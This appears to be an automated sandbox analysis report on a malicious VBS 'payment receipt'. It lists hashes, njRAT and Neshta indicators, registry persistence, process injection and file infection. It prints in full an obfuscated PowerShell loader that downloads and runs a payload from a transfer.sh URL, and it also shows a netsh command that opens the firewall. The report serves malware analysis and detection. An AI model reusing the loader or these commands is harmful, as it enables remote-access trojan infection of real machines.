Analysis
-
max time kernel
151s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
05-01-2022 08:22
Static task
static1
Behavioral task
behavioral1
Sample
7H2B1N27_PAYMENT_RECEIPT.vbs
Resource
win7-en-20211208
General
-
Target
7H2B1N27_PAYMENT_RECEIPT.vbs
-
Size
2KB
-
MD5
1cf9e3a75322042644a95e4d9eb359bc
-
SHA1
27469cadb09a071e5ee98e6a6492bf1ee16bd170
-
SHA256
7ad872e2d279268cc3107a90337b4beb3be0fc888668d60e6995d64b8955b2e6
-
SHA512
a97d371a84e9ec64821022d64439ac6b04befe0fc2b4231b721450cbc12d70cc3232a53df936a4158e8c5e380c66ef6d1dff66aff4c0b5909652b3dc4f7a41ad
Malware Config
Extracted
https://transfer.sh/get/BKC469/HHHHHHHHHHHHHHHH.txt
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Detect Neshta Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1324-148-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral2/memory/1324-149-0x00000000004080E4-mapping.dmp family_neshta behavioral2/memory/1324-154-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta -
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" aspnet_compiler.exe -
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 9 2824 powershell.exe -
Modifies Windows Firewall 1 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
aspnet_compiler.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\" .." aspnet_compiler.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\" .." aspnet_compiler.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exedescription pid process target process PID 2824 set thread context of 1324 2824 powershell.exe aspnet_compiler.exe PID 2824 set thread context of 1044 2824 powershell.exe aspnet_compiler.exe -
Drops file in Program Files directory 53 IoCs
Processes:
aspnet_compiler.exedescription ioc process File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~4.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOF5E2~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI54FB~1\setup_wm.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI54FB~1\wmlaunch.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\armsvc.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~4\ACCESS~1\wordpad.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GO664E~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~3\PACKAG~1\{F4220~1\VC_RED~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~2\WinMail.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe aspnet_compiler.exe File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI54FB~1\wmprph.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI54FB~1\wmpshare.exe aspnet_compiler.exe File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~2.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI54FB~1\wmpconfig.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI54FB~1\wmplayer.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe aspnet_compiler.exe File opened for modification C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~3.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe aspnet_compiler.exe -
Drops file in Windows directory 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process File opened for modification C:\Windows\svchost.com aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 2824 powershell.exe Token: SeDebugPrivilege 1044 aspnet_compiler.exe Token: 33 1044 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1044 aspnet_compiler.exe Token: 33 1044 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1044 aspnet_compiler.exe Token: 33 1044 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1044 aspnet_compiler.exe Token: 33 1044 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1044 aspnet_compiler.exe Token: 33 1044 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1044 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
WScript.exepowershell.exeaspnet_compiler.exedescription pid process target process PID 2404 wrote to memory of 2824 2404 WScript.exe powershell.exe PID 2404 wrote to memory of 2824 2404 WScript.exe powershell.exe PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe PID 1044 wrote to memory of 4040 1044 aspnet_compiler.exe netsh.exe PID 1044 wrote to memory of 4040 1044 aspnet_compiler.exe netsh.exe PID 1044 wrote to memory of 4040 1044 aspnet_compiler.exe netsh.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7H2B1N27_PAYMENT_RECEIPT.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &((gv '*MDR*').naMe[3,11,2]-joIN'') ( (('(0PG (Rd9&(Lz0PG+0PGS{0'+'PG+0PG0}Rd9+Rd0PG+0'+'PG9{1}LzRd0PG+0PG9+Rd0PG+0PG9S0PG+0PG-fRd9+Rd9X'+'EzIR0PG+0PGd0PG+0PG9'+'+R0PG+0PGd9EXEz,XEzR'+'d9'+'+Rd9XXEz)(.R0PG+0PGd0PG+0PG9+Rd9(0PG+0PGLRd9+Rd9z0PG+0PGS{10PG+0PG}{0}R0PG+0PGd9+R0PG+0PGd90PG+0PG{20PG+0PG}LzS -R0PG+0PGd90PG+0PG+Rd90PG+0PGfXERd0PG+0PG90PG+0PG+Rd0PG'+'+0PG9zORd9+Rd9bXEz,(LR0PG+0PGd0PG+0PG9+Rd90PG+0PGzS{1}0PG+0PGRd90PG+0PG+0PG+0PGR0PG+0PGd9{0Rd9+Rd9}LzS 0PG+0PG-f'+'Rd9+Rd9 0PG+0PGRd9+Rd90PG+0PGXEz0PG+0PGw-Rd9+0P'+'G+0PGRd9XEz,XE0PG+0PGz0PG+0PGRd0'+'PG+0PG9+R'+'d9N0PG+0PGeXEz)Rd9+Rd90PG+0PG,(0PG+0PGLz0PG+0PGS{0}{1R0PG+0PGd0PG+0PG9+Rd9}Rd9+Rd90PG+0PGLz0PG+0PGS-Rd9+Rd0PG+0PG9fXEz0PG+0PGjeXE0PG+0PGz0PG+0PG,XEzRd0PG+0PG9+Rd0PG+0PG9ctX0PG+0PGEz)) (LzS{2Rd90PG+0PG+R0PG+0PGd90PG'+'+0PG}{0}0PG+0PG{'+'0PG+0PG1Rd9+Rd9}LzSRd9+0PG+0PGRd0PG+0PG9-fRd9+Rd9 R'+'d90PG+0PG+Rd9(Lz0PG+0PGRd9+Rd0PG+0PG9S{1}{0}{0PG+0PG2Rd0PG+0PG90PG+0PG+R0PG+0PGd9}Rd9+Rd9LzS 0PG+0PG-f Rd9+Rd9XRd9+Rd9EzbCl0PG+0PGXEz,XEz.W0PG+0PGe0PG+0PGXR'+'d'+'9+Rd9ERd90PG+0PG+R0PG+0PGd90PG+0PGz,XEz0PG+0PGiX0PG+0PGEz)0PG+0PG,R0PG+0PGd9+Rd9XERd9+R0PG+0PGd9ze0PG+0PGntXEz,X0PG+0PGR0PG+0PGd9+R0PG+0PGd9EzNetXEz'+')).0PG+0PG(L0PG+0PGRd9+Rd9zRd90P'+'G+0PG+Rd90PG+0P'+'GS{Rd0PG+0PG90PG+0PG+Rd0PG+0PG90}{2Rd9+0PG'+'+0PGRd'+'9}0PG+0PG{3}{0PG+0PG1}{40PG+0PG}LRd90PG+0PG+Rd9zSRd9+Rd9 0PG+0PG-f XE0PG+0PGzDXERd9+Rd9z,Rd9+R0PG+0PGd9XEzdstXEz'+',XE0PG+0PGzow0PG+0PGnXERd'+'9+R0PG+0PGd9z,R0PG+0PGd9+0PG+0PGR0PG+0PGd90PG+0PGXEzloaXER0PG+0PGd90P'+'G'+'+0PG+Rd90PG+0PGz,(LRd0PG+0PG9+0P'+'G+0PGRd9z0PG+0PGRd9+Rd9S0PG+0PG{0}{1}LzRd9+Rd0PG+0PG9S -Rd9+0PG+0PGRd9fRd0PG'+'+0PG9+R'+'d9XEzrRd9'+'+R0PG+0PGd9iXEz,0PG+0PGX0'+'PG+0PGEzn0PG+0PGgXEz0PG+0PGRd9+Rd90'+'PG+0PG)).LRd9+Rd9'+'zSINRd9+Rd0PG+0PG9vOLGykERd9+Rd9'+'LzS(0PG+0'+'PGXEzhttps://transfer.sh/get/BKC469/HHHHHHHHHHHHHHHH.txtX0PG+0PGRd9+Rd9Ez)Rd0PG+0PG90PG+0PG).rEp'+'l0PG+0P'+'GacE(Rd9LGyRd9'+',0PG+0PGR0PG+0PGd9tYaRd0PG+0PG9).rEplacE(([cHaR]76+0PG+0PG[cHaR]122+[0PG+0PGcHaR0PG+0PG]0PG+0PG83),[STrinG]0PG+0PG[0PG+0PGc'+'HaR]34)0PG+0PG.rEplacE(([cHaR]80PG+0PG8+[cHaR]60PG+0PG9+[cHaR]120PG+0PG2),[0PG+0PGSTr'+'inG][cHa0PG+0PGR]30PG+0PG9)0c0PG'+'+0PGoIn0PG+0PGVo0PG+0PGkE-E0PG+0PGxpre'+'sSi0PG+0PGo0PG+0PGN0PG).rEplaCe(0PGRd90PG,[sTrIng][CHar]39).rEplaCe(0PG0co0PG,0PGvKO0PG).rEplaCe(([CHar'+']116+[CHar]89+[CHar]97),[sTrIng][CHar]96)vKO .( kSfEnV:COmspeC[4,24,25]-jOIN0'+'PG0PG)') -replace ([CHaR]118+[CHaR]75+[CHaR]79),[CHaR]124-crEpLace([CHaR]48+[CHaR]80+[CHaR]71),[CHaR]39 -replace 'kSf',[CHaR]36))2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\ALLUSE~1\Genetor\MICROS~1.EXEMD5
1e98e92a982af948ee18ee819a2d8ad1
SHA16cb0bd87815118351e5e32c50b434079dfba255c
SHA256235d3f96a78ce2dad584e6eb1a25fc386b3ae5e332c4d3c56f03b0a4978be778
SHA5126711de2e00462c49852cee03fd8ef720310c4ffa5b3a653c08f2913a6146974f28b8a3b3ff38b3097310852a5aa3b964b77945bcefef3856911eb9acd0e42c6f
-
memory/1044-157-0x00000000050E0000-0x000000000517C000-memory.dmpFilesize
624KB
-
memory/1044-163-0x0000000005C60000-0x0000000005C6A000-memory.dmpFilesize
40KB
-
memory/1044-161-0x0000000005180000-0x000000000567E000-memory.dmpFilesize
5.0MB
-
memory/1044-159-0x0000000005580000-0x0000000005612000-memory.dmpFilesize
584KB
-
memory/1044-158-0x0000000005680000-0x0000000005B7E000-memory.dmpFilesize
5.0MB
-
memory/1044-156-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1044-155-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1044-152-0x000000000040BBCE-mapping.dmp
-
memory/1044-151-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1324-148-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/1324-154-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/1324-149-0x00000000004080E4-mapping.dmp
-
memory/2824-136-0x000001F2442A6000-0x000001F2442A8000-memory.dmpFilesize
8KB
-
memory/2824-153-0x000001F244210000-0x000001F244212000-memory.dmpFilesize
8KB
-
memory/2824-135-0x000001F244210000-0x000001F244212000-memory.dmpFilesize
8KB
-
memory/2824-115-0x0000000000000000-mapping.dmp
-
memory/2824-137-0x000001F244210000-0x000001F244212000-memory.dmpFilesize
8KB
-
memory/2824-147-0x000001F25CAF0000-0x000001F25CB02000-memory.dmpFilesize
72KB
-
memory/2824-131-0x000001F2442A0000-0x000001F2442A2000-memory.dmpFilesize
8KB
-
memory/2824-127-0x000001F244210000-0x000001F244212000-memory.dmpFilesize
8KB
-
memory/2824-150-0x000001F25CB00000-0x000001F25CB12000-memory.dmpFilesize
72KB
-
memory/2824-126-0x000001F25CB10000-0x000001F25CB86000-memory.dmpFilesize
472KB
-
memory/2824-125-0x000001F244210000-0x000001F244212000-memory.dmpFilesize
8KB
-
memory/2824-132-0x000001F2442A3000-0x000001F2442A5000-memory.dmpFilesize
8KB
-
memory/2824-124-0x000001F244210000-0x000001F244212000-memory.dmpFilesize
8KB
-
memory/2824-123-0x000001F244210000-0x000001F244212000-memory.dmpFilesize
8KB
-
memory/2824-122-0x000001F244210000-0x000001F244212000-memory.dmpFilesize
8KB
-
memory/2824-121-0x000001F25C960000-0x000001F25C982000-memory.dmpFilesize
136KB
-
memory/2824-120-0x000001F244210000-0x000001F244212000-memory.dmpFilesize
8KB
-
memory/2824-119-0x000001F244210000-0x000001F244212000-memory.dmpFilesize
8KB
-
memory/2824-117-0x000001F244210000-0x000001F244212000-memory.dmpFilesize
8KB
-
memory/2824-118-0x000001F244210000-0x000001F244212000-memory.dmpFilesize
8KB
-
memory/2824-116-0x000001F244210000-0x000001F244212000-memory.dmpFilesize
8KB
-
memory/4040-160-0x0000000000000000-mapping.dmp